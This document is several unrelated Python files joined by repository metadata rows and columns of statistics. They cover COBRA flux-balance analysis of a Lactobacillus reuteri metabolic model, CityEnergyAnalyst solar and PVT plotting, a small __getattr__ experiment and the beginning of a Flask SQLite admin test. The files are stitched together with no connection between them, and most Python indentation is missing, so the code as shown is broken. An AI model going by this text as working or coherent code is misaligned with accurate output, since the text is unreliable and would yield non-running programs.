model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limitations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except Exception:
pass  # some of these exchange reactions are absent in certain models
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('13ppd_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'Y_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <reuterin: 3-hydroxypropionaldehyde (3-HPA), 3-hydroxypropanal, 3hppnl> TODO: 3hppnl
met_i = Lreu_draft_3_refined.metabolites.get_by_id('3hpp_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('3HPPt'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_3hpp_e'))
objective_rea = 'EX_3hpp_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517,iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon sources:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limitations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except Exception:
pass  # some of these exchange reactions are absent in certain models
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
# iML1515: 13PPDH2
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('3hpp_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'Y_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <Histamine hista_c>
met_i = Lreu_draft_3_refined.metabolites.get_by_id('hista_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
# Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISDC'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISTAap'))
rea = cobra.Reaction('EX_hista_e')
Lreu_draft_3_refined.add_reaction(rea)
Lreu_draft_3_refined.reactions.get_by_id('EX_hista_e').reaction = 'hista_e --> '
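# The hand-written 'EX_hista_e' sink ('hista_e --> ') lets histamine leave the
# system so it can serve as an objective; HISTAap, borrowed from Lreuteri_530,
# is expected to provide the transport step out of the cytosol.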
objective_rea = 'EX_hista_e'
Lreu_draft_3_refined.objective = objective_rea
Lreu_draft_3_refined.reactions.get_by_id('EX_his__L_e').bounds = (-5, 1000)
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <vitamin B12: cobalamin> TODO: adenosylcobalamin (adocbl); TODO: gap!
# objectiverea = 'EX_adocbl_e'
# Lreu_draft_3_refined.objective = objectiverea
# print('Lreu opt value: ',Lreu_draft_3_refined.optimize().objective_value)
#
# Lreuteri_530.objective = objectiverea
# Lreuteri_530.optimize()
# NOTE: adocbl is named adeadocbl in this model, and the pathway is not reliable.
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('ADOCBLS'))
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('RZ5PP'))
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('NNDMBRT'))
#
# # Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISTAap'))
#
# rea1 = cobra.Reaction('ADOCBLt')
# rea2 = cobra.Reaction('EX_adocbl_e')
# Lreu_draft_3_refined.add_reaction(rea1)
# Lreu_draft_3_refined.add_reaction(rea2)
# Lreu_draft_3_refined.reactions.get_by_id('ADOCBLt').reaction = 'adocbl_c --> adocbl_e'
# Lreu_draft_3_refined.reactions.get_by_id('EX_adocbl_e').reaction = 'adocbl_e --> '
# objectiverea = 'ADOCBLS'#'EX_adocbl_e'
# Lreu_draft_3_refined.objective = objectiverea
# print('Lreu opt value: ',Lreu_draft_3_refined.optimize().objective_value)
# iML1515.objective = 'BIOMASS_Ec_iML1515_WT_75p37M'
# iML1515.optimize()
# # TODO adeadocbl_c --> c
# %% <vitamin B9 Folate > TODO: fol_c
met_i = Lreu_draft_3_refined.metabolites.get_by_id('fol_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
objective_rea = 'EX_fol_e' # 'EX_adocbl_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <EPS: exopolysaccharide > NOTE: no
# %% <other SCFAs>
# %%<others:>
# <Mannitol mnl_e>
objective_rea = 'EX_mnl_e' # 'EX_adocbl_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <output files>
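# Metabolites whose compartment is not 'c' or 'e' get it re-derived from the id
# suffix (e.g. 'xyz_e' -> 'e') before the model is exported.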
for i in Lreu_draft_3_refined.metabolites:
if i.compartment not in ['c', 'e']:
i.compartment = i.id.split('_')[-1]
print(Lreu_draft_3_refined.reactions.get_by_id('BIOMASS').reaction)  # show the biomass reaction before export
Lreu_draft_3_refined.objective = 'BIOMASS'
print('Lreu opt biomass value: ', Lreu_draft_3_refined.optimize().objective_value)
cobra.io.save_json_model(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.json')
My_def.io_file.model2txt(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.txt', sort=True)
cobra.io.write_sbml_model(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.xml')
comd = ' memote report snapshot --filename "Lreu_draft_3_refined_part02.html" Lreu_draft_3_refined_part02.xml'
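# memote (assumed to be installed and on PATH) renders an HTML quality report
# for the exported SBML; os.system simply returns the shell's exit status.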
os.system(comd)
| 43.968
| 126
| 0.70756
| 3,567
| 21,984
| 3.941968
| 0.063639
| 0.065785
| 0.092099
| 0.185478
| 0.896451
| 0.888557
| 0.873764
| 0.857691
| 0.839414
| 0.828319
| 0
| 0.061703
| 0.147062
| 21,984
| 499
| 127
| 44.056112
| 0.688177
| 0.182724
| 0
| 0.781457
| 0
| 0
| 0.137301
| 0.025499
| 0
| 0
| 0
| 0.002004
| 0
| 1
| 0
| false
| 0.019868
| 0.009934
| 0
| 0.009934
| 0.099338
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0659b3217901c7e9d1f75a811a4542bf1d206536
| 13,512
|
py
|
Python
|
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | 1
|
2018-08-16T14:34:23.000Z
|
2018-08-16T14:34:23.000Z
|
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
"""
Solar graphs
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def calc_graph_I_sol(hourlydata_groups):
isolation = hourlydata_groups.rename(columns={0: 'Group 1', 1: 'Group 3', 2: 'Group 2'})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
isolation.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('Solar insolation (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
isolation[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('Solar insolation (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
isolation[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('Solar insolation (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
isolation[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('Solar insolation (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_PV(results,results_perarea):
PV_production = pd.DataFrame({'Group 1':results[0],'Group 2':results[2],'Group 3':results[1], 'Total':(results[0]+results[1]+results[2])})
PV_production_perarea = pd.DataFrame({'Group 1':results_perarea[0]*1000,'Group 2':results_perarea[2]*1000,'Group 3':results_perarea[1]*1000})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
PV_production_perarea.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PV_production_perarea[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PV_production_perarea[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PV_production_perarea[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
PV_production.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('PV potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PV_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('PV potential (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PV_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('PV potential (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PV_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('PV potential (kW)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_SC(result ,prop_observers, number_points, Tin):
Area_group1 = prop_observers.loc[0,'area_netpv']*number_points[0]
Area_group2 = prop_observers.loc[1,'area_netpv']*number_points[1]
Area_group3 = prop_observers.loc[2,'area_netpv']*number_points[2]
SC_production = pd.DataFrame({'Group 1':result[0][1]/Area_group1*1000,'Group 2':result[2][1]/Area_group3*1000,'Group 3':result[1][1]/Area_group2*1000})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,600])); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True, ylim=([0,600])); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True, ylim=([0,200])); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
SC_production = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,25000])); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('SC potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True, ylim=([0,25000])); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('SC potential (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True, ylim=([0,8000])); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('SC potential (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('SC potential (kW)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
Toutvector = np.nan_to_num(np.divide((result[0][1]+result[2][1]+result[1][1]),(result[0][5]+result[2][5]+result[1][5])) + Tin)
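# Toutvector: outlet temperature estimated as total heat delivered divided by the
# total capacity flow rate (mcp), plus the inlet temperature Tin; np.nan_to_num
# replaces the NaNs produced in hours where mcp is zero.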
SC_production = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
SC_losses = pd.DataFrame({'Group 1':result[0][0],'Group 2':result[2][0],'Group 3':result[1][0], 'Total':(result[0][0]+result[2][0]+result[1][0])})
SC_aux = pd.DataFrame({'Group 1':result[0][2],'Group 2':result[2][2],'Group 3':result[1][2], 'Total':(result[0][2]+result[2][2]+result[1][2])})
SC_Tout = pd.DataFrame({'Group 1':result[0][3],'Group 2':result[2][3],'Group 3':result[1][3], 'Total':Toutvector})  # Group 3 uses result[1], consistent with the other columns
SC_mcp = pd.DataFrame({'Group 1':result[0][5],'Group 2':result[2][5],'Group 3':result[1][5], 'Total':(result[0][5]+result[2][5]+result[1][5])})
# <codecell>
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,20000])); ax1.set_title('Thermal Output',fontsize=25); ax1.set_ylabel('SC potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_losses.plot(ax = ax2, legend =False, antialiased=True, ylim=([0,1000])); ax2.set_title('Thermal Losses',fontsize=25); ax2.set_ylabel('losses (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_aux.plot(ax = ax3, legend =False, antialiased=True, ylim=([0,200])); ax3.set_title('Auxiliary electricity',fontsize=25); ax3.set_ylabel('Eaux (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_Tout.plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Return temperature',fontsize=25); ax4.set_ylabel('Tout (C)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_PVT(result, Tin):  # NOTE: renamed from a second 'calc_graph_SC' definition that shadowed the one above and actually plots PVT output
Toutvector = np.nan_to_num(np.divide((result[0][1]+result[2][1]+result[1][1]),(result[0][5]+result[2][5]+result[1][5])) + Tin)
PVT_thermal_gen = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
PVT_losses = pd.DataFrame({'Group 1':result[0][0],'Group 2':result[2][0],'Group 3':result[1][0], 'Total':(result[0][0]+result[2][0]+result[1][0])})
PVT_aux = pd.DataFrame({'Group 1':result[0][2],'Group 2':result[2][2],'Group 3':result[1][2], 'Total':(result[0][2]+result[2][2]+result[1][2])})
PVT_Tout = pd.DataFrame({'Group 1':result[0][3],'Group 2':result[2][3],'Group 3':result[1][3], 'Total':Toutvector})  # Group 3 uses result[1], consistent with the other columns
PVT_mcp = pd.DataFrame({'Group 1':result[0][5],'Group 2':result[2][5],'Group 3':result[1][5], 'Total':(result[0][5]+result[2][5]+result[1][5])})
PVT_electrical_gen = pd.DataFrame({'Group 1':result[0][6],'Group 2':result[2][6],'Group 3':result[1][6], 'Total':(result[0][6]+result[2][6]+result[1][6])})
# <codecell>
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize=(32, 24), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]; ax5 = axes[2,0]; ax6 = axes[2,1]
PVT_thermal_gen.plot(ax = ax1, ylim=([0,30000])); ax1.set_title('Thermal Output',fontsize=25); ax1.set_ylabel(r'$\Phi_{PVT,th}$'+' (kW)',fontsize = 30 );ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PVT_losses.plot(ax = ax2, legend =False, antialiased=True, ylim=([0,400])); ax2.set_title('Distribution thermal Losses',fontsize=25); ax2.set_ylabel(r'$\Phi_{PVT,dis,l}$'+' (kW)',fontsize = 30 );ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PVT_electrical_gen.plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Electrical Output',fontsize=25); ax3.set_ylabel(r'$\Phi_{PVT,e}$'+' (kW)',fontsize = 30 );ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PVT_aux.plot(ax = ax4, legend =False, antialiased=True, ylim=([0,200])); ax4.set_title('Auxiliary electricity',fontsize=25); ax4.set_ylabel(r'$\Phi_{PVT,aux}$'+' (kW)',fontsize = 30 );ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
PVT_mcp.plot(ax = ax5, legend =False, antialiased=True); ax5.set_title('Capacity mass flow rate',fontsize=25); ax5.set_ylabel(r'$\.{mCp}$'+' (kW/C)',fontsize = 30 );ax5.set_xlabel('Hour of the year',fontsize=20);ax5.tick_params(axis='x', labelsize=20);ax5.tick_params(axis='y', labelsize=20)
PVT_Tout.plot(ax = ax6, legend =False, antialiased=True); ax6.set_title('Return temperature',fontsize=25); ax6.set_ylabel(r'$\mathit{T_{PVT, out}}$'+' (C)',fontsize = 30 );ax6.set_xlabel('Hour of the year',fontsize=20);ax6.tick_params(axis='x', labelsize=20);ax6.tick_params(axis='y', labelsize=20)
return
| 116.482759
| 329
| 0.701377
| 2,297
| 13,512
| 4.006966
| 0.074445
| 0.066276
| 0.091265
| 0.048892
| 0.861256
| 0.839744
| 0.815732
| 0.790635
| 0.777597
| 0.771838
| 0
| 0.090364
| 0.086812
| 13,512
| 115
| 330
| 117.495652
| 0.655564
| 0.00259
| 0
| 0.238095
| 0
| 0
| 0.155851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.035714
| 0
| 0.130952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
066c396f36bb46c0521fe991a90fcb4a2c2f663e
| 47
|
py
|
Python
|
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
def run():
return (u'This still works!!!')
| 15.666667
| 35
| 0.574468
| 7
| 47
| 3.857143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 47
| 2
| 36
| 23.5
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
06810e1bd19e4139bdc4f994025c8ca331e51848
| 460
|
py
|
Python
|
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | null | null | null |
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | 46
|
2017-06-30T22:19:07.000Z
|
2017-07-31T22:51:31.000Z
|
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | null | null | null |
import datetime
#print(int('100').__getattr__('abcdefg')) # AttributeError: 'int' object has no attribute '__getattr__'
#print(str('abc').__getattr__('abcdefg')) # AttributeError: 'str' object has no attribute '__getattr__'
#print(range(3).__getattr__('abcdefg')) # AttributeError: 'range' object has no attribute '__getattr__'
#print(datetime.datetime.now().__getattr__('abcdefg')) # AttributeError: 'datetime.datetime' object has no attribute '__getattr__'
| 65.714286
| 130
| 0.76087
| 52
| 460
| 6.115385
| 0.326923
| 0.176101
| 0.352201
| 0.251572
| 0.386792
| 0.301887
| 0
| 0
| 0
| 0
| 0
| 0.009501
| 0.084783
| 460
| 6
| 131
| 76.666667
| 0.745843
| 0.936957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ebfd1c163c53ebe9cdcade12d7193d2ef35d015d
| 12,052
|
py
|
Python
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 6
|
2018-09-26T02:58:56.000Z
|
2020-07-21T14:55:39.000Z
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 2
|
2019-08-08T01:45:59.000Z
|
2019-09-21T16:54:32.000Z
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 5
|
2017-04-07T14:49:54.000Z
|
2020-09-16T09:38:08.000Z
|
import unittest
import os
import tempfile
from flask import Flask, make_response, redirect, url_for, request
from core import sqliteAdminBlueprint
import sqlite3
from functools import wraps
db_file = tempfile.mkstemp()
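# tempfile.mkstemp() returns an (OS-level file descriptor, path) tuple; db_file[1]
# used below is the path of the temporary SQLite database shared by the test apps.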
class flask_test_app:
""" basic app setup """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1])
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprint(unittest.TestCase):
""" test basic blueprint functionality """
def setUp(self):
self.db_fd, flask_test_app.app.config['DATABASE'] = db_file
flask_test_app.app.config['TESTING'] = True
self.app = flask_test_app.app.test_client()
self.con = sqlite3.connect(flask_test_app.app.config['DATABASE'])
self.con.execute('CREATE TABLE company( id integer PRIMARY KEY autoincrement, name TEXT NOT NULL, age integer NOT NULL, address CHAR(50), salary REAL );')
